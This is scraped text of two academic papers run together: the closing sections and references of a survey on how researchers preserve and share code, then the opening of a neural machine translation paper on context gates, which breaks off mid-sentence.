is a building block for ensuring the reproducibility, 39.9% of participants (N = 183) do302 not prepare their code for long-term preservation.303 How long do you typically save your code or software?304 Figure 9(a) shows that the majority of our participants (40.4% out of 162) preserve their code for more than305 eight years, but generally not in a way that maintains its use. In contrast, 7.4% (N = 162) of participants306 keep their codes until it is described in a publication, poster, or presentation. We found 10.5% out of 162307 researchers tend to keep their codes 3 years or less and 19.8% tend to keep their codes 4-8 year. Only308 21.0% out of 162 researchers tend to keep their codes for 8 years or more with maintaining their codes for309 future access and use.310 Where do you save your code or software so that it is preserved over the long term?311 In terms of where our participants preserve their code, Figure 9(b) shows that 76.2% of the time participants312 use code hosting sites such as Github. About 56.4% of the time, researchers use hard drives or external313 storage to preserve their codes and 38.1% of the time they preserve their codes by putting them on314 the cloud. Only 12.7% of our participants indicated that they use archival repositories (e.g. figshare).315 The participants who entered “other” responses mentioned that they use a backup system of their lab,316 organization archive (e.g., University server), their own PC, language package registry (CRAN, PyPi or317 similar), Internal SVN repository, or project specific websites.318 11/17 More than 8 years without maintaining More than 8 years and maintained 4−8 years 0−3 years Until it is described in a publication % 0 10 20 30 40 50 41.4 21 19.8 10.5 7.4 (a) How long do you typically save your code or software? N = 162. On a code hosting site On a hard drive/external storage In the cloud On my website In an archival repository Other In a discipline specific index or registry % 0 20 40 60 80 76.2 56.4 38.1 20.4 12.7 10.5 3.9 (b) Where do you save your code or software so that it is preserved over the long term? N = 182. Figure 9. 76.2% of researchers use Github for preserving their codes. Note that the second question could be answered with more than one choice. We asked participants to define sharing and preserving in their own words. Their responses generally319 indicated that they make a distinction between the two concepts. For example, one participant stated320 succinctly, “sharing is making code available to others, in a readily usable form. Preserving is ensuring321 to the extent practical that the code will be usable as far into the future as possible.” However, several322 responses indicated that participants did not necessarily regard preservation as an active process that323 continues even after the conclusion of a particular project (e.g. “sharing means giving access to my code324 to someone else. Preserving means placing my code somewhere where it can remain and I will not delete325 it to save room or lose it when I switch computers or suffer a hard drive failure.”. In contrast, other326 responses indicated that participants were aware that preservation is important for reuse purpose and had a327 knowledge of preservation tools. For example, one researcher defined preserving software as, “branching328 so that code remains compatible with different versions of overarching libraries (in my case) or with329 new coding standards and compilers”. and another stated “Preserving should be done via a system like330 LOCKSS that ensures that provides for redundancy. Sharing can be done via the web, but must include a331 license so that recipients know about their rights.”332 8 DISCUSSION333 Scholars throughout the humanities and sciences depend on software for a wide variety of purposes,334 including the collection, analysis, and visualization of data (Borgman et al. (2012); Hey et al. (2009)).335 Though ubiquitous, software presents significant challenges to efforts aimed at ensuring reproducibility.336 Our results demonstrate that researchers not only create and use software in a wide variety of forms and337 for a wide variety of purposes, but also that their software-related practices are often not completely in338 line with those associated with reproducibility. In particular, our results demonstrate that, while scholars339 often save their software for long periods of time, many do not actively preserve or maintain it. This340 perspective is perhaps best encapsulated by one of our participants who, when completing our open341 response question about the definition of sharing and preserving software, wrote “Sharing means making342 it publicly available on Github. Preserving means leaving it on GitHub”. We share this anecdote not343 to criticize our participants or their practices, but to illustrate the outstanding need for support services344 related to software.345 In the broader scholarly communications space, there are several prominent frameworks that relate to346 the reproducibility of scholarly outputs. As part of an effort to advance data as a “first class” research347 product, the FAIR (Findable, Accessible, Interoperable, and Reusable) guidelines provide a measurable348 set of principles related to the management and sharing of research data (Wilkinson et al. (2016)).349 12/17 The FAIR principles are general enough that they can, with some modification, also be applied to350 software (Jimenez et al. (2017)). At the level of scholarly publications, the TOP (Transparency and351 Openness Promotion) guidelines (Nosek et al. (2015)) addresses citation standards and the availability of352 research materials including data and software. A supplement to TOP, the Reproducibility Enhancement353 Principles (REP) (Stodden et al. (2016)) specifically targets disclosure issues related to computation354 and software. However, our results support previous work indicating that software still mostly exists355 outside the reputation economy of science (Howison and Herbsleb (2011)) which indicates that a more356 education-based approach, that provides guidance about software before the publication stage is necessary.357 The majority of our participants indicated that view code or software as “first class” research product,358 that should be assessed, valued, and shared in the same way as a journal article. However, our results359 also indicate that there remains a significant gap between this perception and actual practice. The fact360 that our participants indicated that they create and use software in a wide variety of forms and for a wide361 variety of purposes demonstrates the significant technical challenges inherent in ensuring computational362 reproducibility. In contrast, the lack of active preservation and tendency to share software outside363 traditional (and measurable) scholarly communications channels displayed by our sample demonstrates364 the social and behavioral challenges. A significant difficulty in ensuring computational reproducibility is365 that researchers oftentimes do not treat their software as a “first class” research product. These findings366 reinforce the need for programs to train researchers on how to maintain their code in the active phase of367 their research.368 At present, there are a number of initiatives focused on addressing the preservation and reproducibility369 of software. In the United States, the Software Preservation Network (SPN) (Meyerson et al. (2017))370 represents an effort to coordinate efforts to ensure the long-term access to software. The focus of SPN is371 generally on cultural heritage software rather than research software, but their work delineating issues372 related to metadata, governance, and technical infrastructure has substantial overlap with what is required373 for research software. In the United Kingdom, the Software Sustainability Institute trains researchers374 on how to develop better software and make better use of the supporting infrastructure (Crouch et al.375 (2013)). Befitting the necessity of training and preservation indicated by our study, a similar effort, the376 US Software Sustainability Initiative was recently awarded funding by the National Science Foundation377 (NSF Award #1743188). While it is likely not possible for academic institutions to offer support services378 that cover the broad range of programming languages and applications described in our survey results,379 collaborating with such groups to create guidance and best practice recommendations may a feasible first380 step in engaging with researchers about their software and code in the same manner as many research381 data management (RDM) initiatives now engage with them about their data.382 While research stakeholders including academic institutions, publishers, and funders have an interest383 in tackling issues of computational reproducibility in order to ensure the integrity of the research process,384 our results demonstrate the complexity of doing so. One participant summed up why their code could not385 be made re-usable: “Most of my coding is project specific and not reusable between projects because the386 datasets I encounter are very variable. I typically only generate packages for tasks such as getting data387 from a database (e.g., PubMed) and keeping RMarkdown templates in an orderly way.”388 9 CONCLUSION AND FUTURE WORK389 In this paper, we introduced the results of surveying researchers across different institution on software390 usage, sharing, and preservation. We also checked the practices used to manage software for ensuring391 the reproducibility and integrity of the scientific research. Our results point to several interesting trends392 including the widespread writing of source code and use of source code written by others, the variety393 of programming languages used and the lack of consistency even within the same lab or research394 group, the use of open source software over commercial software, and the adoption of some practices395 assure computational reproducibility, such as adding comments and documentation to code, but not others,396 specifically the general lack of active preservation. The findings of this paper inform ongoing conversations397 about research software and reproducibility on the current practices around research software. This will398 help service providers to deliver the right tools and systems that help researchers to manage their code399 and help in ensuring the integrity of the reproducibility in the scholarly ecosystem.400 The present study was designed to capture a broad picture of how researchers use and share their401 software. For this reason, we were not able to provide a particularly granular picture of how individual402 practices relate to reproducible science outcomes. For example, while the majority of our participants403 13/17 responded that they include comments in their source code and generate documentation for their software,404 we were not able to make any judgment about whether or not the contents of these comments and405 documentation are sufficient to ensure reproducibility. Follow up research is needed in order to gain a406 more nuanced understanding of how processes related to the creation and use of research software relate407 to reproducibility. However, despite these limitations, our results indicate several potential directions for408 future library services centered on helping researchers create, use, and share their software and assure409 computational reproducibility.410 ACKNOWLEDGMENTS411 We would like to thank our colleagues at UC Berkeley Library and California Digital Library for their412 valuable suggestions and insightful comments throughout this project.413 REFERENCES414 AlNoamany, Y. and Borghi, J. A. (2018a). Data: Researcher perspectives on the use and sharing of415 software.416 AlNoamany, Y. and Borghi, J. A. (2018b). Software study code.417 Barnes, N. (2010). Publish your computer code: it is good enough. Nature, 467(7317):753–753.418 Boettiger, C. (2015). An introduction to docker for reproducible research. ACM SIGOPS Operating419 Systems Review, 49(1):71–79.420 Borgman, C. L., Wallis, J. C., and Mayernik, M. S. (2012). Who’s got the data? interdependencies in421 science and technology collaborations. Computer Supported Cooperative Work (CSCW), 21(6):485–422 523.423 Chirigati, F., Shasha, D., and Freire, J. (2013). Reprozip: Using provenance to support computational424 reproducibility. In Proceedings of the 5th USENIX Workshop on the Theory and Practice of Provenance,425 TaPP ’13, pages 1–4. USENIX Association.426 Crouch, S., Hong, N. C., Hettrick, S., Jackson, M., Pawlik, A., Sufi, S., Carr, L., Roure, D. D., Goble, C.,427 and Parsons, M. (2013). The software sustainability institute: Changing research software attitudes and428 practices. Computing in Science & Engineering, 15(6):74–80.429 Eglen, S. J., Marwick, B., Halchenko, Y. O., Hanke, M., Sufi, S., Gleeson, P., Silver, R. A., Davison, A. P.,430 Lanyon, L., Abrams, M., Wachtler, T., Willshaw, D. J., Pouzat, C., and Poline, J.-B. (2017). Toward431 standard practices for sharing computer code and programs in neuroscience. Nature Neuroscience,432 20:770.433 Fecher, B., Friesike, S., and Hebing, M. (2015). What drives academic data sharing? PLOS ONE,434 10(2):1–25.435 Goble, C. (2014). Better software, better research. IEEE Internet Computing, 18(5):4–8.436 Goodman, S. N., Fanelli, D., and Ioannidis, J. P. A. (2016). What does research reproducibility mean?437 Science Translational Medicine, 8(341):341ps12–341ps12.438 Hafer, L. and Kirkpatrick, A. E. (2009). Assessing open source software as a scholarly contribution.439 Communications of the ACM, 52(12):126–129.440 Hannay, J. E., MacLeod, C., Singer, J., Langtangen, H. P., Pfahl, D., and Wilson, G. (2009). How do441 scientists develop and use scientific software? In Proceedings of the 2009 ICSE Workshop on Software442 Engineering for Computational Science and Engineering, SECSE ’09, pages 1–8. IEEE Computer443 Society.444 Hey, T., Tansley, S., and Tolle, K. (2009). The Fourth Paradigm: Data-Intensive Scientific Discovery.445 Microsoft Research.446 Hong, N. C. (2011). Digital preservation and curation: the danger of overlooking software. The447 Preservation of Complex Objects, page 25.448 Hong, N. C. (2014). Dealing with software: the research data issues.449 Howison, J. and Bullard, J. (2015a). How is software visible in the scientific literature. Technical report,450 Technical report, Univ. of Texas.451 Howison, J. and Bullard, J. (2015b). Software in the scientific literature: Problems with seeing, finding,452 and using software mentioned in the biology literature. Journal of the Association for Information453 Science and Technology.454 Howison, J. and Herbsleb, J. D. (2011). Scientific software production: Incentives and collaboration.455 14/17 In Proceedings of the ACM 2011 Conference on Computer Supported Cooperative Work, CSCW ’11,456 pages 513–522. ACM.457 Howison, J. and Herbsleb, J. D. (2013). Incentives and integration in scientific software production. In458 Proceedings of the ACM 2013 Conference on Computer Supported Cooperative Work, CSCW ’13,459 pages 459–470. ACM.460 Hucka, M. and Graham, M. J. (2016). Software search is not a science, even among scientists. CoRR,461 abs/1605.02265.462 Inc., S. E. (2016). Developer survey results 2016.463 Ince, D. C., Hatton, L., and Graham-Cumming, J. (2012). The case for open computer programs. Nature,464 482:485.465 Jimenez, R., Kuzak, M., Alhamdoosh, M., Barker, M., Batut, B., Borg, M., Capella-Gutierrez, S.,466 Chue Hong, N., Cook, M., Corpas, M., Flannery, M., Garcia, L., GelpÌ, J., Gladman, S., Goble, C.,467 Gonz·lez Ferreiro, M., Gonzalez-Beltran, A., Griffin, P., Gr¸ning, B., Hagberg, J., Holub, P., Hooft,468 R., Ison, J., Katz, D., Leskoek, B., Lupez Gumez, F., Oliveira, L., Mellor, D., Mosbergen, R., Mulder,469 N., Perez-Riverol, Y., Pergl, R., Pichler, H., Pope, B., Sanz, F., Schneider, M., Stodden, V., Suchecki,470 R., Svobodov· Va?ekov·, R., Talvik, H., Todorov, I., Treloar, A., Tyagi, S., van Gompel, M., Vaughan,471 D., Via, A., Wang, X., Watson-Haigh, N., and Crouch, S. (2017). Four simple recommendations472 to encourage best practices in research software [version 1; referees: 3 approved]. F1000Research,473 6(876).474 Joppa, L. N., McInerny, G., Harper, R., Salido, L., Takeda, K., O’Hara, K., Gavaghan, D., and Emmott, S.475 (2013). Troubling trends in scientific software use. Science, 340(6134):814–815.476 Katz, D. S., Allen, G., Hong, N. C., Parashar, M., and Proctor, D. (2013). First workshop on sustainable477 software for science: Practice and experiences (wssspe): Submission and peer-review process, and478 results. arXiv preprint arXiv:1311.3523.479 Kim, Y. and Stanton, J. M. (2016). Institutional and individual factors affecting scientists’ data-sharing480 behaviors: A multilevel analysis. Journal of the Association for Information Science and Technology,481 67(4):776–799.482 Kissel, R., Kissel, R., Blank, R., and Secretary, A. (2011). Glossary of key information security terms. In483 NIST Interagency Reports NIST IR 7298 Revision 1, National Institute of Standards and Technology.484 Kluyver, T., Ragan-Kelley, B., Pérez, F., Granger, B., Bussonnier, M., Frederic, J., Kelley, K., Hamrick, J.,485 Grout, J., Corlay, S., Ivanov, P., Avila, D., Abdalla, S., Willing, C., and development team [Unknown],486 J. (2016). Jupyter notebooks: A publishing format for reproducible computational workflows. In487 Loizides, F. and Scmidt, B., editors, Positioning and Power in Academic Publishing: Players, Agents488 and Agendas, pages 87–90. IOS Press.489 Kratz, J. E. and Strasser, C. (2015). Researcher perspectives on publication and peer review of data. PLOS490 ONE, 10(2):1–21.491 Marwick, B. (2017). Computational reproducibility in archaeological research: Basic principles and a492 case study of their implementation. Journal of Archaeological Method and Theory, 24(2):424–450.493 McCarthy, D. J., Humburg, P., Kanapin, A., Rivas, M. A., Gaulton, K., Cazier, J.-B., and Donnelly, P.494 (2014). Choice of transcripts and software has a large effect on variant annotation. Genome Medicine,495 6(3):26.496 Meyerson, J., Vowell, Z., Hagenmaier, W., Leventhal, A., Roke, E. R., Rios, F., and Walsh, T. (2017). The497 Software Preservation Network (SPN): A Community Effort to Ensure Long Term Access to Digital498 Cultural Heritage. D-Lib Magazine, 23(5/6).499 Monteith, J. Y., McGregor, J. D., and Ingram, J. E. (2014). Scientific research software ecosystems. In500 Proceedings of the 2014 European Conference on Software Architecture Workshops, ECSAW ’14,501 pages 9:1–9:6. ACM.502 Morin, A., Urban, J., Adams, P. D., Foster, I., Sali, A., Baker, D., and Sliz, P. (2012a). Shining light into503 black boxes. Science, 336(6078):159–160.504 Morin, A., Urban, J., and Sliz, P. (2012b). A quick guide to software licensing for the scientist-programmer.505 PLOS Computational Biology, 8(7):1–7.506 Munafò, M. R., Nosek, B. A., Bishop, D. V. M., Button, K. S., Chambers, C. D., Percie du Sert, N.,507 Simonsohn, U., Wagenmakers, E.-J., Ware, J. J., and Ioannidis, J. P. A. (2017). A manifesto for508 reproducible science. Nature Human Behaviour, 1(1):0021.509 NIH (2016). Strategies for nih data management, sharing, and citation.510 15/17 Nosek, B. A., Alter, G., Banks, G. C., Borsboom, D., Bowman, S. D., Breckler, S. J., Buck, S., Chambers,511 C. D., Chin, G., Christensen, G., Contestabile, M., Dafoe, A., Eich, E., Freese, J., Glennerster, R.,512 Goroff, D., Green, D. P., Hesse, B., Humphreys, M., Ishiyama, J., Karlan, D., Kraut, A., Lupia,513 A., Mabry, P., Madon, T., Malhotra, N., Mayo-Wilson, E., McNutt, M., Miguel, E., Paluck, E. L.,514 Simonsohn, U., Soderberg, C., Spellman, B. A., Turitto, J., VandenBos, G., Vazire, S., Wagenmakers,515 E. J., Wilson, R., and Yarkoni, T. (2015). Promoting an open research culture. Science, 348(6242):1422–516 1425.517 Nosek, B. A., Spies, J. R., and Motyl, M. (2012). Scientific utopia: Ii. restructuring incentives and518 practices to promote truth over publishability. Perspectives on Psychological Science, 7(6):615–631.519 Pan, X., Yan, E., and Hua, W. (2016). Disciplinary differences of software use and impact in scientific520 literature. Scientometrics, 109(3):1593–1610.521 Perez, F. and Granger, B. E. (2007). Ipython: A system for interactive scientific computing. Computing in522 Science Engineering, 9(3):21–29.523 Piccolo, S. R. and Frampton, M. B. (2016). Tools and techniques for computational reproducibility.524 GigaScience, 5(1):30.525 Prabhu, P., Jablin, T. B., Raman, A., Zhang, Y., Huang, J., Kim, H., Johnson, N. P., Liu, F., Ghosh, S.,526 Beard, S., Oh, T., Zoufaly, M., Walker, D., and August, D. I. (2011). A survey of the practice of527 computational science. In State of the Practice Reports, SC ’11, pages 19:1–19:12. ACM.528 Prlić, A. and Procter, J. B. (2012). Ten simple rules for the open development of scientific software. PLoS529 Comput Biol, 8(12):e1002802.530 Ram, K., Katz, D., Carver, J., Gesing, S., and Weber, N. (2017). Si2-s2i2 conceptualization: Conceptual-531 izing a us research software sustainability institute (urssi).532 Rios, F. (2016). The Pathways of Research Software Preservation: An Educational and Planning Resource533 for Service Development. D-Lib Magazine, 22(7/8).534 Sadowski, C., Stolee, K. T., and Elbaum, S. (2015). How developers search for code: a case study. In535 Proceedings of the 2015 10th Joint Meeting on Foundations of Software Engineering, pages 191–201.536 ACM.537 Sandve, G. K., Nekrutenko, A., Taylor, J., and Hovig, E. (2013). Ten simple rules for reproducible538 computational research. PLOS Computational Biology, 9(10):1–4.539 Smith, A. M., Katz, D. S., and Niemeyer, K. E. a. (2016). Software citation principles. PeerJ Computer540 Science, 2:e86.541 Stodden, V. (2009). The legal framework for reproducible scientific research: Licensing and copyright.542 Computing in Science & Engineering, 11(1):35–40.543 Stodden, V., Guo, P., and Ma, Z. (2013). Toward reproducible computational research: An empirical544 analysis of data and code policy adoption by journals. PLOS ONE, 8(6):1–8.545 Stodden, V., Leisch, F., and Peng, R. D. (2014). Implementing reproducible research. CRC Press.546 Stodden, V., McNutt, M., Bailey, D. H., Deelman, E., Gil, Y., Hanson, B., Heroux, M. A., Ioannidis, J. P.,547 and Taufer, M. (2016). Enhancing reproducibility for computational methods. Science, 354(6317):1240–548 1241.549 Teal, T. K., Cranston, K. A., Lapp, H., White, E., Wilson, G., Ram, K., and Pawlik, A. (2015). Data550 carpentry: workshops to increase data literacy for researchers. International Journal of Digital Curation,551 10(1):135–143.552 Tenopir, C., Allard, S., Douglass, K., Aydinoglu, A. U., Wu, L., Read, E., Manoff, M., and Frame, M.553 (2011). Data sharing by scientists: practices and perceptions. PloS one, 6(6):e21101.554 Tenopir, C., Dalton, E. D., Allard, S., Frame, M., Pjesivac, I., Birch, B., Pollock, D., and Dorsett, K. (2015).555 Changes in Data Sharing and Data Reuse Practices and Perceptions among Scientists Worldwide. PLOS556 ONE, 10(8):1–24.557 Thain, D., Ivie, P., and Meng, H. (2015). Techniques for Preserving Scientific Software Executions:558 Preserve the Mess or Encourage Cleanliness? Proceedings of the 12th International Conference on559 Digital Preservation (iPRES).560 Vandewalle, P. (2012). Code sharing is associated with research impact in image processing. Computing561 in Science Engineering, 14(4):42–47.562 Wellcome (2017). Policy on data, software and materials management and sharing.563 Wilkinson, M. D., Dumontier, M., Aalbersberg, I. J., Appleton, G., Axton, M., Baak, A., Blomberg, N.,564 Boiten, J.-W., da Silva Santos, L. B., Bourne, P. E., Bouwman, J., Brookes, A. J., Clark, T., Crosas,565 16/17 M., Dillo, I., Dumon, O., Edmunds, S., Evelo, C. T., Finkers, R., Gonzalez-Beltran, A., Gray, A. J. G.,566 Groth, P., Goble, C., Grethe, J. S., Heringa, J., ’t Hoen, P. A. C., Hooft, R., Kuhn, T., Kok, R., Kok, J.,567 Lusher, S. J., Martone, M. E., Mons, A., Packer, A. L., Persson, B., Rocca-Serra, P., Roos, M., van568 Schaik, R., Sansone, S.-A., Schultes, E., Sengstag, T., Slater, T., Strawn, G., Swertz, M. A., Thompson,569 M., van der Lei, J., van Mulligen, E., Velterop, J., Waagmeester, A., Wittenburg, P., Wolstencroft,570 K., Zhao, J., and Mons, B. (2016). The FAIR Guiding Principles for scientific data management and571 stewardship. Scientific Data, 3:160018.572 Wilson, G. (2006). Software carpentry: Getting scientists to write better code by making them more573 productive. Computing in Science & Engineering, 8(6):66–69.574 Wilson, G., Bryan, J., Cranston, K., Kitzes, J., Nederbragt, L., and Teal, T. K. (2017). Good enough575 practices in scientific computing. PLOS Computational Biology, 13(6):1–20.576 17/17 work_ygxu3etm6zehvdovnjdt3htauu ---- Context Gates for Neural Machine Translation Zhaopeng Tu† Yang Liu‡ Zhengdong Lu† Xiaohua Liu† Hang Li† †Noah’s Ark Lab, Huawei Technologies, Hong Kong {tu.zhaopeng,lu.zhengdong,liuxiaohua3,hangli.hl}@huawei.com ‡Department of Computer Science and Technology, Tsinghua University, Beijing liuyang2011@tsinghua.edu.cn Abstract In neural machine translation (NMT), genera- tion of a target word depends on both source and target contexts. We find that source con- texts have a direct impact on the adequacy of a translation while target contexts affect the flu- ency. Intuitively, generation of a content word should rely more on the source context and generation of a functional word should rely more on the target context. Due to the lack of effective control over the influence from source and target contexts, conventional NMT tends to yield fluent but inadequate transla- tions. To address this problem, we propose context gates which dynamically control the ratios at which source and target contexts con- tribute to the generation of target words. In this way, we can enhance both the adequacy and fluency of NMT with more careful con- trol of the information flow from contexts. Experiments show that our approach signif- icantly improves upon a standard attention- based NMT system by +2.3 BLEU points. 1 Introduction Neural machine translation (NMT) (Kalchbrenner and Blunsom, 2013; Sutskever et al., 2014; Bah- danau et al., 2015) has made significant progress in the past several years. Its goal is to construct and utilize a single large neural network to accom- plish the entire translation task. One great advan- tage of NMT is that the translation system can be completely constructed by learning from data with- out human involvement (cf., feature engineering in statistical machine translation (SMT)). The encoder- decoder architecture is widely employed (Cho et al., input jı̄nnián qián liǎng yuè guǎngdōng gāoxı̄n jı̀shù chǎnpı̌n chūkǒu 37.6yı̀ měiyuán NMT in the first two months of this year , the export of new high level technology product was UNK - billion us dollars 5src china ’s guangdong hi - tech exports hit 58 billion dollars 5tgt china ’s export of high and new hi - tech exports of the export of the export of the export of the export of the export of the export of the export of the export of · · · Table 1: Source and target contexts are highly cor- related to translation adequacy and fluency, respec- tively. 5src and 5tgt denote halving the contribu- tions from the source and target contexts when gen- erating the translation, respectively. 2014; Sutskever et al., 2014), in which the encoder summarizes the source sentence into a vector repre- sentation, and the decoder generates the target sen- tence word-by-word from the vector representation. The representation of the source sentence and the representation of the partially generated target sen- tence (translation) at each position are referred to as source context and target context, respectively. The generation of a target word is determined jointly by the source context and target context. Several techniques in NMT have proven to be very effective, including gating (Hochreiter and Schmidhuber, 1997; Cho et al., 2014) and at- tention (Bahdanau et al., 2015) which can model long-distance dependencies and complicated align- 87 Transactions of the Association for Computational Linguistics, vol. 5, pp. 87–99, 2017. Action Editor: Chris Quirk. Submission batch: 6/2016; Revision batch: 10/2016; Published 3/2017. c©2017 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. ment relations in the translation process. Using an encoder-decoder framework that incorporates gat- ing and attention techniques, it has been reported that the performance of NMT can surpass the per- formance of traditional SMT as measured by BLEU score (Luong et al., 2015). Despite this success, we observe that NMT usu- ally yields fluent but inadequate translations.1 We attribute this to a stronger influence of target con- text on generation, which results from a stronger language model than that used in SMT. One ques- tion naturally arises: what will happen if we change the ratio of influences from the source or target con- texts? Table 1 shows an example in which an attention- based NMT system (Bahdanau et al., 2015) gener- ates a fluent yet inadequate translation (e.g., missing the translation of “guǎngdōng”). When we halve the contribution from the source context, the result fur- ther loses its adequacy by missing the partial trans- lation “in the first two months of this year”. One possible explanation is that the target context takes a higher weight and thus the system favors a shorter translation. In contrast, when we halve the con- tribution from the target context, the result com- pletely loses its fluency by repeatedly generating the translation of “chūkǒu” (i.e., “the export of”) un- til the generated translation reaches the maximum length. Therefore, this example indicates that source and target contexts in NMT are highly correlated to translation adequacy and fluency, respectively. In fact, conventional NMT lacks effective control on the influence of source and target contexts. At each decoding step, NMT treats the source and tar- get contexts equally, and thus ignores the different needs of the contexts. For example, content words in the target sentence are more related to the transla- tion adequacy, and thus should depend more on the source context. In contrast, function words in the target sentence are often more related to the trans- lation fluency (e.g., “of” after “is fond”), and thus should depend more on the target context. In this work, we propose to use context gates to control the contributions of source and target con- texts on the generation of target words (decoding) 1Fluency measures whether the translation is fluent, while adequacy measures whether the translation is faithful to the original sentence (Snover et al., 2009). Figure 1: Architecture of decoder RNN. in NMT. Context gates are non-linear gating units which can dynamically select the amount of context information in the decoding process. Specifically, at each decoding step, the context gate examines both the source and target contexts, and outputs a ratio between zero and one to determine the percentages of information to utilize from the two contexts. In this way, the system can balance the adequacy and fluency of the translation with regard to the genera- tion of a word at each position. Experimental results show that introducing con- text gates leads to an average improvement of +2.3 BLEU points over a standard attention-based NMT system (Bahdanau et al., 2015). An interesting find- ing is that we can replace the GRU units in the de- coder with conventional RNN units and in the mean- time utilize context gates. The translation perfor- mance is comparable with the standard NMT system with GRU, but the system enjoys a simpler structure (i.e., uses only a single gate and half of the param- eters) and a faster decoding (i.e., requires only half the matrix computations for decoding).2 2 Neural Machine Translation Suppose that x = x1, . . .xj, . . .xJ represents a source sentence and y = y1, . . .yi, . . .yI a target sentence. NMT directly models the probability of translation from the source sentence to the target sentence word by word: P(y|x) = I∏ i=1 P(yi|y<i,x) (1) 2Our code is publicly available at https://github. com/tuzhaopeng/NMT. 88 where y<i = y1, . . . ,yi−1. As shown in Figure 1, the probability of generating the i-th word yi is com- puted by using a recurrent neural network (RNN) in the decoder: P(yi|y<i,x) = g(yi−1, ti,si) (2) where g(·) first linearly transforms its input then ap- plies a softmax function, yi−1 is the previously gen- erated word, ti is the i-th decoding hidden state, and si is the i-th source representation. The state ti is computed as follows: ti = f(yi−1, ti−1,si) = f(We(yi−1) + Uti−1 + Csi) (3) where • f(·) is a function to compute the current de- coding state given all the related inputs. It can be either a vanilla RNN unit using tanh func- tion, or a sophisticated gated RNN unit such as GRU (Cho et al., 2014) or LSTM (Hochreiter and Schmidhuber, 1997). • e(yi−1) ∈ Rm is an m-dimensional embedding of the previously generated word yi−1. • si is a vector representation extracted from the source sentence by the encoder. The encoder usually uses an RNN to encode the source sentence x into a sequence of hidden states h = h1, . . .hj, . . .hJ , in which hj is the hidden state of the j-th source word xj. si can be either a static vector that summarizes the whole sentence (e.g., si ≡ hJ ) (Cho et al., 2014; Sutskever et al., 2014), or a dy- namic vector that selectively summarizes cer- tain parts of the source sentence at each decod- ing step (e.g., si = ∑J j=1 αi,jhj in which αi,j is alignment probability calculated by an atten- tion model) (Bahdanau et al., 2015). • W ∈ Rn×m, U ∈ Rn×n, C ∈ Rn×n′ are matri- ces with n and n′ being the numbers of units of decoder hidden state and source representation, respectively. The inputs to the decoder (i.e., si, ti−1, and yi−1) represent the contexts. Specifically, the source rep- resentation si stands for source context, which em- beds the information from the source sentence. The (a) Lengths of translations in words. (b) Subjective evaluation. Figure 2: Effects of source and target contexts. The pair (a,b) in the legends denotes scaling source and target contexts with ratios a and b respectively. previous decoding state ti−1 and the previously gen- erated word yi−1 constitute the target context.3 2.1 Effects of Source and Target Contexts We first empirically investigate our hypothesis: whether source and target contexts correlate to trans- lation adequacy and fluency. Figure 2(a) shows the translation lengths with various scaling ratios (a,b) 3In a recent implementation of NMT (https: //github.com/nyu-dl/dl4mt-tutorial), ti−1 and yi−1 are combined together with a GRU before being fed into the decoder, which can boost translation performance. We follow the practice and treat both of them as target context. 89 for source and target contexts: ti = f(b⊗ (We(yi−1) + Uti−1) + a⊗Csi) For example, the pair (1.0, 0.5) means fully lever- aging the effect of source context while halving the effect of target context. Reducing the effect of tar- get context (i.e., the lines (1.0, 0.8) and (1.0, 0.5)) results in longer translations, while reducing the ef- fect of source context (i.e., the lines (0.8, 1.0) and (0.5, 1.0)) leads to shorter translations. When halv- ing the effect of the target context, most of the gener- ated translations reach the maximum length, which is three times the length of source sentence in this work. Figure 2(b) shows the results of manual evalu- ation on 200 source sentences randomly sampled from the test sets. Reducing the effect of source con- text (i.e., (0.8, 1.0) and (0.5, 1.0)) leads to more flu- ent yet less adequate translations. On the other hand, reducing the effect of target context (i.e., (1.0, 0.5) and (1.0, 0.8)) is expected to yield more adequate but less fluent translations. In this setting, the source words are translated (i.e., higher adequacy) while the translations are in wrong order (i.e., lower flu- ency). In practice, however, we observe the side ef- fect that some source words are translated repeatedly until the translation reaches the maximum length (i.e., lower fluency), while others are left untrans- lated (i.e., lower adequacy). The reason is two fold: 1. NMT lacks a mechanism that guarantees that each source word is translated.4 The decod- ing state implicitly models the notion of “cover- age” by recurrently reading the time-dependent source context si. Lowering its contribution weakens the “coverage” effect and encour- ages the decoder to regenerate phrases multiple times to achieve the desired translation length. 2. The translation is incomplete. As shown in Ta- ble 1, NMT can get stuck in an infinite loop repeatedly generating a phrase due to the over- whelming influence of the source context. As a result, generation terminates early because 4The recently proposed coverage based technique can allevi- ate this problem (Tu et al., 2016). In this work, we consider an- other approach, which is complementary to the coverage mech- anism. Figure 3: Architecture of context gate. the translation reaches the maximum length al- lowed by the implementation, even though the decoding procedure is not finished. The quantitative (Figure 2) and qualitative (Ta- ble 1) results confirm our hypothesis, i.e., source and target contexts are highly correlated to translation adequacy and fluency. We believe that a mechanism that can dynamically select information from source context and target context would be useful for NMT models, and this is exactly the approach we propose. 3 Context Gates 3.1 Architecture Inspired by the success of gated units in RNN (Hochreiter and Schmidhuber, 1997; Cho et al., 2014), we propose using context gates to dynamically control the amount of information flowing from the source and target contexts and thus balance the fluency and adequacy of NMT at each decoding step. Intuitively, at each decoding step i, the context gate looks at input signals from both the source (i.e., si) and target (i.e., ti−1 and yi−1) sides, and outputs a number between 0 and 1 for each element in the input vectors, where 1 denotes “completely trans- ferring this” while 0 denotes “completely ignoring this”. The corresponding input signals are then pro- cessed with an element-wise multiplication before being fed to the activation layer to update the decod- ing state. Formally, a context gate consists of a sigmoid neural network layer and an element-wise multipli- cation operation, as illustrated in Figure 3. The con- text gate assigns an element-wise weight to the input 90 (a) Context Gate (source) (b) Context Gate (target) (c) Context Gate (both) Figure 4: Architectures of NMT with various context gates, which either scale only one side of translation contexts (i.e., source context in (a) and target context in (b)) or control the effects of both sides (i.e., (c)). signals, computed by zi = σ(Wze(yi−1) + Uzti−1 + Czsi) (4) Here σ(·) is a logistic sigmoid function, and Wz ∈ Rn×m, Uz ∈ Rn×n, Cz ∈ Rn×n ′ are the weight matrices. Again, m, n and n′ are the dimensions of word embedding, decoding state, and source rep- resentation, respectively. Note that zi has the same dimensionality as the transferred input signals (e.g., Csi), and thus each element in the input vectors has its own weight. 3.2 Integrating Context Gates into NMT Next, we consider how to integrate context gates into an NMT model. The context gate can decide the amount of con- text information used in generating the next target word at each step of decoding. For example, after obtaining the partial translation “. . . new high level technology product”, the gate looks at the translation contexts and decides to depend more heavily on the source context. Accordingly, the gate assigns higher weights to the source context and lower weights to the target context and then feeds them into the de- coding activation layer. This could correct inade- quate translations, such as the missing translation of “guǎngdōng”, due to greater influence from the tar- get context. We have three strategies for integrating context gates into NMT that either affect one of the transla- tion 